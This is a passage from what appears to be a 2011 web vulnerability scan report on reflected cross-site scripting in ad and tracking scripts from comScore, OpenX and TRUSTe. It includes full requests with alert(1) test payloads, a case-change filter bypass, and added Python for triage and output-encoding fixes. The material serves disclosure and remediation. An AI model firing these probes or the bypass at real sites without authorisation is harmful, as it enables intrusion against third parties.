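            state = "code"
        elif state == "block-comment" and ch == "*" and nxt == "/":
            state, i = "code", i + 1
        i += 1
    return state


def reflection_context(content_type: str, body: str, marker: str) -> str:
    """Where does the first occurrence of marker land in the response?"""
    idx = body.find(marker)
    if idx < 0:
        return "not-reflected"
    if any(t in content_type.lower() for t in JS_TYPES):
        return "js-" + js_state_at(body, idx)
    head = body[:idx]        # HTML: inside a tag if the last '<' is still open
    return "html-tag" if head.rfind("<") > head.rfind(">") else "html-text"


def lands_in_code(context: str, payload: str) -> bool:
    """True when the reflected bytes are parsed as markup or JavaScript rather
    than kept as string data. It says nothing about whether they are *valid*
    code: a <script> tag dropped into bare JS is just a syntax error."""
    if context == "html-text":
        return "<" in payload
    if context == "js-dq-string":
        return re.search(r'(?<!\\)"', payload) is not None   # closes the literal
    if context == "js-sq-string":
        return re.search(r"(?<!\\)'", payload) is not None
    return context == "js-code"


# Response fragments from this report; the last two samples are constructed.
SAMPLES = {
    "3.34 comScore c3": ("application/x-javascript",
        'COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2febf6<script>alert(1)</script>b19c58ceea3", c4:""});',
        "febf6<script>alert(1)</script>b19c58ceea3"),
    "3.38 OpenX c (JSONP callback)": ("text/javascript; charset=utf-8",
        'OXM_2758334807592868<script>alert(1)</script>ee1fafea211({"r":null});',
        "92868<script>alert(1)</script>ee1fafea211"),
    "3.44 TRUSTe ox": ("text/javascript",
        "var te_bi = {'ox':20a5e47<script>alert(1)</script>27256ed0b74, 'oy':0};",
        "a5e47<script>alert(1)</script>27256ed0b74"),
    "3.47 Pulse360 id (constructed)": ("text/javascript",
        "var id='91041742fbbee';alert(1)//a187687dcce';",
        "fbbee';alert(1)//a187687dcce"),
    "HTML text (constructed)": ("text/html",
        "<p>search: febf6<script>alert(1)</script>b19c58ceea3</p>",
        "febf6<script>alert(1)</script>b19c58ceea3"),
}


def triage(samples=SAMPLES):
    """Map each sample name to (context, lands_in_code)."""
    out = {}
    for name, (ctype, body, marker) in samples.items():
        ctx = reflection_context(ctype, body, marker)
        out[name] = (ctx, lands_in_code(ctx, marker))
    return out


if __name__ == "__main__":
    for name, (ctx, live) in triage().items():
        print(f"{name:32} {ctx:14} {'parsed as code' if live else 'inert string data'}")
```

Run stand-alone it prints one line per sample. The comScore hit classifies as a double-quoted JS string with no break-out in the payload, the OpenX callback and the TRUSTe ox value as bare code, and the pulse360 case as a single-quoted string that the payload does terminate; only the last three are reflections where the bytes reach a parser.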



3.35. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the JavaScript response (Content-Type: application/x-javascript), inside a double-quoted string literal in the object passed to COMSCORE.beacon(). The payload ea8f6<script>alert(1)</script>102f2c0a45 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

The parameter is not output-encoded for a JavaScript string context. Because the reflection lands inside a string literal, the demonstrated payload is inert data; it reaches the JavaScript parser only if the literal is first terminated, which this test did not exercise.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=ea8f6<script>alert(1)</script>102f2c0a45&c5=&c6=&c15=&tm=669483 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 14:00:52 GMT
Date: Mon, 09 May 2011 14:00:52 GMT
Connection: close
Content-Length: 1234

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"ea8f6<script>alert(1)</script>102f2c0a45", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.36. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the JavaScript response (Content-Type: application/x-javascript), inside a double-quoted string literal in the object passed to COMSCORE.beacon(). The payload 6f7ba<script>alert(1)</script>eda40b8879f was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

The parameter is not output-encoded for a JavaScript string context. Because the reflection lands inside a string literal, the demonstrated payload is inert data; it reaches the JavaScript parser only if the literal is first terminated, which this test did not exercise.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=6f7ba<script>alert(1)</script>eda40b8879f&c6=&c15=&tm=669483 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 14:00:52 GMT
Date: Mon, 09 May 2011 14:00:52 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"6f7ba<script>alert(1)</script>eda40b8879f", c6:"", c10:"", c15:"", c16:"", r:""});



3.37. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the JavaScript response (Content-Type: application/x-javascript), inside a double-quoted string literal in the object passed to COMSCORE.beacon(). The payload 7e18e<script>alert(1)</script>03378f6c3ff was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

The parameter is not output-encoded for a JavaScript string context. Because the reflection lands inside a string literal, the demonstrated payload is inert data; it reaches the JavaScript parser only if the literal is first terminated, which this test did not exercise.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=7e18e<script>alert(1)</script>03378f6c3ff&c15=&tm=669483 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 14:00:52 GMT
Date: Mon, 09 May 2011 14:00:52 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"7e18e<script>alert(1)</script>03378f6c3ff", c10:"", c15:"", c16:"", r:""});



3.38. http://bid.openx.net/json [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The value of the c request parameter is used as the JSONP callback name and is copied into the JavaScript response (Content-Type: text/javascript) as bare code, outside any string literal: the response body is the c value followed by ({"r":null});. The payload 92868<script>alert(1)</script>ee1fafea211 was submitted in the c parameter. This input was echoed unmodified in the application's response.

Because the callback name is not restricted to a JavaScript identifier, whatever is supplied in c becomes the leading tokens of a script resource that any page can load with a <script src> element. The <script> tag used here is a syntax error in that position, so this request does not itself execute code; the finding is the missing allow-list on the callback name, which is the usual JSONP callback-injection condition.

Request

GET /json?c=OXM_2758334807592868<script>alert(1)</script>ee1fafea211&pid=dd81ea27-d6ee-482c-a1ae-66747444994b&s=468x60&f=0.6&cid=oxpv1%3A72-1331-4020-944-2650&hrid=02eea6ce6a94fccf845961f4c7a8855c-1304949600&url=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://www.surphace.com/ads/rubicon_orlandosentinel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=02dd71c0-6aac-4019-82e3-049e51d96c25; p=1304805364

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: s=2790e8cf-579c-4f5e-bf61-6238ae1e9422; version=1; path=/; domain=.openx.net;
Set-Cookie: p=1304949605; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_2758334807592868<script>alert(1)</script>ee1fafea211({"r":null});

3.39. http://choices.truste.com/ca [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the c request parameter is copied into the JavaScript response (Content-Type: text/javascript) in two places: unquoted, spliced into the variable name var te_clr1_att02cont3982fc<script>alert(1)</script>61b53c30a60_ib, and again inside the single-quoted string literal that holds the <div id="te-clr1-..."> HTML fragment. The payload 982fc<script>alert(1)</script>61b53c30a60 was submitted in the c parameter. This input was echoed unmodified in the application's response.

The first reflection point is bare code: the c value becomes part of a JavaScript statement with no quote to break out of, so the submitted <script> tag is a syntax error there, but that is a property of the test payload rather than of the injection point. The second reflection point places the same value inside an HTML fragment held in a JavaScript string, so the parameter reaches a markup context as well.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3982fc<script>alert(1)</script>61b53c30a60&w=728&h=90&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/286738708/direct;wi.728;hi.90/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B543fcfdf7fc5a5a2%253B12fd50f27eb%2C0%253B%253B%253B2045613379%2CqgEAAAaQGwAUf3sAAAAAAKfzHgAAAAAAAgEAAAYAAAAAAP8AAAACCo0ELQAAAAAAdgMpAAAAAABEySgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnlhEAAAAAAAIAAwAAAAAA6icP1S8BAAAAAAAAAGIyNTgwZDA2LTdhNDQtMTFlMC1iM2UxLWNmYTM2ZmYyM2UwNwBEiQEAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Efloridatoday%2Ecom%252Farticle%252F20110508%252Fnews01%252F105080319%252Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13049496301806342-86546%26campID%3D64375%26crID%3D86546%26pubICode%3D2687862%26pub%3D347615%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fwww%2Efloridatoday%2Ecom%2Farticle%2F20110508%2Fnews01%2F105080319%2Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:10 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 5150

if (typeof truste == "undefined" || !truste) {    var truste= {};    truste.ca= {};    truste.ca.listeners = {};    truste.img = new Image(1,1);    truste.defjsload = false;        truste.ts = null; //initi
...[SNIP]...
baseName] = bindings;    }}    // prototypes    String.prototype.equalsIgnoreCase = function(arg) {        return (new String(this.toLowerCase()) == (new String(arg)).toLowerCase());    }    var te_clr1_att02cont3982fc<script>alert(1)</script>61b53c30a60_ib = '<div id="te-clr1-att02cont3982fc<script>
...[SNIP]...

3.40. http://choices.truste.com/ca [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the cid request parameter is copied into the JavaScript response (Content-Type: text/javascript), inside the double-quoted string literal cid:"..." of the te_clr1_att02cont3_bi binding object. The payload cab56<ScRiPt>alert(1)</ScRiPt>f72a5ea7915 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

Because the reflection lands inside a string literal, the demonstrated payload is inert data; it reaches the JavaScript parser only if the literal is first terminated, which this test did not exercise. The finding is the missing output encoding for that context, together with the filter bypass below.

The application blocks the lowercase sequence <script> but compares it case-sensitively: submitting <ScRiPt> instead of <script> passes the filter and is echoed unchanged.

Remediation detail

Blacklist filters that look for known-bad strings are usually inadequate (this one falls to a case change) and should be replaced by allow-list input validation plus output encoding that matches the context the value is written into, here a JavaScript string literal.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90cab56<ScRiPt>alert(1)</ScRiPt>f72a5ea7915&c=att02cont3&w=728&h=90&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/286738708/direct;wi.728;hi.90/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B543fcfdf7fc5a5a2%253B12fd50f27eb%2C0%253B%253B%253B2045613379%2CqgEAAAaQGwAUf3sAAAAAAKfzHgAAAAAAAgEAAAYAAAAAAP8AAAACCo0ELQAAAAAAdgMpAAAAAABEySgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnlhEAAAAAAAIAAwAAAAAA6icP1S8BAAAAAAAAAGIyNTgwZDA2LTdhNDQtMTFlMC1iM2UxLWNmYTM2ZmYyM2UwNwBEiQEAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Efloridatoday%2Ecom%252Farticle%252F20110508%252Fnews01%252F105080319%252Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13049496301806342-86546%26campID%3D64375%26crID%3D86546%26pubICode%3D2687862%26pub%3D347615%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fwww%2Efloridatoday%2Ecom%2Farticle%2F20110508%2Fnews01%2F105080319%2Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:04 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 3841

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.listeners={};truste.img=new Image(1,1);
truste.defjsload=false;truste.ts=null;truste.seq="0";truste.ca.txl={object:[{":widt
...[SNIP]...
_att02cont3_bi)",icon:"http://choices.truste.com/assets/admarker.png",icon_cam:"http://choices.truste.com/assets/adicon.png",iconText:"",aid:"att02",pid:"mec01",zindex:"10002",cam:"2",cid:"0311wl728x90cab56<ScRiPt>alert(1)</ScRiPt>f72a5ea7915"};
var tecabaseurl="http://choices.truste.com/";truste.ca.addEvent(window,"load",function(){var a=te_clr1_att02cont3_bi;
if(!truste.defjsload){var c=document.createElement("script");c.src="http://choi
...[SNIP]...
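The filter bypass and remediation notes for the /ca parameters (3.40 through 3.46) come down to two things: a case-sensitive blacklist that is trivially skipped, and values written into JavaScript without encoding for the slot they land in. The Python below is an added illustration; it is not TRUSTe's or OpenX's code and not from the original report. It shows a filter of the kind the report infers beside the routines that would close these findings: an encoder for JavaScript string literals, an integer check for the unquoted ox slot (3.44), and a callback-name allow-list for the JSONP case in 3.38. Function and variable names are the example's own; the same encoder is the fix for the single-quoted string context reported later in 3.47.

```python
import json
import re


def blacklist_filter(value: str):
    """The kind of check the report infers for /ca: reject the literal lowercase
    tag and pass everything else. '<ScRiPt>' is not matched, so it goes through."""
    return None if "<script" in value else value


def js_string_literal(value: str) -> str:
    """Output-encode a value for a JavaScript string literal in a script
    resource. json.dumps escapes quotes, backslashes, control characters and
    all non-ASCII (including U+2028/2029); '<', '>' and '&' are additionally
    backslash-u escaped so the same output is safe inside an inline <script> block."""
    return json.dumps(value).translate(
        {ord("<"): "\\u003c", ord(">"): "\\u003e", ord("&"): "\\u0026"})


IDENT = r"[A-Za-z_$][A-Za-z0-9_$]*"
CALLBACK_RE = re.compile(rf"^{IDENT}(?:\.{IDENT})*$")


def jsonp_callback(name: str):
    """Allow-list for a JSONP callback (the 3.38 context): a dotted JavaScript
    identifier such as 'OXM_27583348075' or 'jQuery.cb1', nothing else."""
    return name if CALLBACK_RE.match(name) else None


def render_binding(cid: str, iplc: str, ox: str) -> str:
    """Emit the binding object the way a hardened /ca would: every string field
    goes through js_string_literal; the numeric field is validated as an
    integer before it is placed unquoted (the 3.44 context)."""
    if not re.fullmatch(r"-?\d{1,6}", ox):
        raise ValueError("ox must be an integer")
    return "var te_clr1_bi={cid:%s,iplc:%s,ox:%d};" % (
        js_string_literal(cid), js_string_literal(iplc), int(ox))


def render_jsonp(callback: str, data: dict) -> str:
    """JSONP response with a validated callback and '<' / '>' escaped in the body."""
    cb = jsonp_callback(callback)
    if cb is None:
        raise ValueError("invalid callback name")
    body = json.dumps(data).replace("<", "\\u003c").replace(">", "\\u003e")
    return f"{cb}({body});"


if __name__ == "__main__":
    tainted = "0311wl728x90cab56<ScRiPt>alert(1)</ScRiPt>f72a5ea7915"
    print("blacklist lets through:", blacklist_filter(tainted))
    print("encoded for JS string: ", js_string_literal(tainted))
    print(render_binding("0311wl728x90", "ctr", "20"))
    print(render_jsonp("OXM_2758334807592868", {"r": None}))
```

Encoding rather than filtering means the angle brackets survive as data (\u003cScRiPt\u003e decodes back to the original characters inside the string) while never forming a tag or terminating the literal; the unquoted slot is handled by typing it, not by escaping it.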

3.41. http://choices.truste.com/ca [iplc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the iplc request parameter is copied into the JavaScript response (Content-Type: text/javascript), inside the double-quoted string literal iplc:"..." of the te_clr1_att02cont3_bi binding object. The payload a034b<ScRiPt>alert(1)</ScRiPt>9291441402 was submitted in the iplc parameter. This input was echoed unmodified in the application's response.

Because the reflection lands inside a string literal, the demonstrated payload is inert data; it reaches the JavaScript parser only if the literal is first terminated, which this test did not exercise. The finding is the missing output encoding for that context, together with the filter bypass below.

The application blocks the lowercase sequence <script> but compares it case-sensitively: submitting <ScRiPt> instead of <script> passes the filter and is echoed unchanged.

Remediation detail

Blacklist filters that look for known-bad strings are usually inadequate (this one falls to a case change) and should be replaced by allow-list input validation plus output encoding that matches the context the value is written into, here a JavaScript string literal.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20&zi=10002&plc=tr&iplc=ctra034b<ScRiPt>alert(1)</ScRiPt>9291441402 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/286738708/direct;wi.728;hi.90/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B543fcfdf7fc5a5a2%253B12fd50f27eb%2C0%253B%253B%253B2045613379%2CqgEAAAaQGwAUf3sAAAAAAKfzHgAAAAAAAgEAAAYAAAAAAP8AAAACCo0ELQAAAAAAdgMpAAAAAABEySgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnlhEAAAAAAAIAAwAAAAAA6icP1S8BAAAAAAAAAGIyNTgwZDA2LTdhNDQtMTFlMC1iM2UxLWNmYTM2ZmYyM2UwNwBEiQEAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Efloridatoday%2Ecom%252Farticle%252F20110508%252Fnews01%252F105080319%252Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13049496301806342-86546%26campID%3D64375%26crID%3D86546%26pubICode%3D2687862%26pub%3D347615%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fwww%2Efloridatoday%2Ecom%2Farticle%2F20110508%2Fnews01%2F105080319%2Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:28 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 3839

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.listeners={};truste.img=new Image(1,1);
truste.defjsload=false;truste.ts=null;truste.seq="0";truste.ca.txl={object:[{":widt
...[SNIP]...
</div>\n';
var te_clr1_att02cont3_bi={baseName:"te-clr1-att02cont3",anchName:"te-clr1-att02cont3-anch",width:728,height:90,ox:20,oy:0,plc:"tr",iplc:"ctra034b<ScRiPt>alert(1)</ScRiPt>9291441402",intDivName:"te-clr1-att02cont3-itl",iconSpanId:"te-clr1-att02cont3-icon",backgroundColor:"white",opacity:0.8,filterOpacity:80,containerId:"att02cont3",noticeBaseUrl:"/camsg?",irBaseUrl:"/cair?",inter
...[SNIP]...

3.42. http://choices.truste.com/ca [js parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the js request parameter is copied into the JavaScript response (Content-Type: text/javascript) as part of the request's own query string, which is echoed inside the double-quoted string literal assigned to c.src, the URL of a <script> element the code creates at load time. The payload e3c58<ScRiPt>alert(1)</ScRiPt>bd57808141b was submitted in the js parameter. This input was echoed unmodified in the application's response.

Because the reflection lands inside a string literal, the demonstrated payload is inert data; it reaches the JavaScript parser only if the literal is first terminated, which this test did not exercise. The finding is the missing output encoding for that context, together with the filter bypass below.

The application blocks the lowercase sequence <script> but compares it case-sensitively: submitting <ScRiPt> instead of <script> passes the filter and is echoed unchanged.

Remediation detail

Blacklist filters that look for known-bad strings are usually inadequate (this one falls to a case change) and should be replaced by allow-list input validation plus output encoding that matches the context the value is written into, here a JavaScript string literal that is also used as a URL.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20&zi=10002&plc=tr&iplc=ctr&js=2e3c58<ScRiPt>alert(1)</ScRiPt>bd57808141b HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/286738708/direct;wi.728;hi.90/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B543fcfdf7fc5a5a2%253B12fd50f27eb%2C0%253B%253B%253B2045613379%2CqgEAAAaQGwAUf3sAAAAAAKfzHgAAAAAAAgEAAAYAAAAAAP8AAAACCo0ELQAAAAAAdgMpAAAAAABEySgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnlhEAAAAAAAIAAwAAAAAA6icP1S8BAAAAAAAAAGIyNTgwZDA2LTdhNDQtMTFlMC1iM2UxLWNmYTM2ZmYyM2UwNwBEiQEAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Efloridatoday%2Ecom%252Farticle%252F20110508%252Fnews01%252F105080319%252Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13049496301806342-86546%26campID%3D64375%26crID%3D86546%26pubICode%3D2687862%26pub%3D347615%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fwww%2Efloridatoday%2Ecom%2Farticle%2F20110508%2Fnews01%2F105080319%2Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:12 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 3805

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.listeners={};truste.img=new Image(1,1);
truste.defjsload=false;truste.ts=null;truste.seq="0";truste.ca.txl={object:[{":widt
...[SNIP]...
nt3_bi;
if(!truste.defjsload){var c=document.createElement("script");c.src="http://choices.truste.com/ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20&zi=10002&plc=tr&iplc=ctr&js=2e3c58<ScRiPt>alert(1)</ScRiPt>bd57808141b&js=2";
document.body.appendChild(c);truste.defjsload=true}truste.ca.addBinding(te_clr1_att02cont3_bi)});

3.43. http://choices.truste.com/ca [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The name of an arbitrarily supplied request parameter is copied into the JavaScript response (Content-Type: text/javascript): the whole query string, unknown parameter names included, is echoed inside the double-quoted string literal assigned to c.src, the URL of a <script> element the code creates at load time. The payload 3114a<ScRiPt>alert(1)</ScRiPt>ef8ccd7b20f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

Because the reflection lands inside a string literal, the demonstrated payload is inert data; it reaches the JavaScript parser only if the literal is first terminated, which this test did not exercise. The finding is the missing output encoding for that context, together with the filter bypass below.

The application blocks the lowercase sequence <script> but compares it case-sensitively: submitting <ScRiPt> instead of <script> passes the filter and is echoed unchanged.

Remediation detail

Blacklist filters that look for known-bad strings are usually inadequate (this one falls to a case change) and should be replaced by allow-list input validation plus output encoding that matches the context the value is written into. Rebuilding the script URL from known parameters, instead of echoing the raw query string, removes the unknown-parameter reflection entirely.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20&zi=10002&plc=tr&iplc=ctr&3114a<ScRiPt>alert(1)</ScRiPt>ef8ccd7b20f=1 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
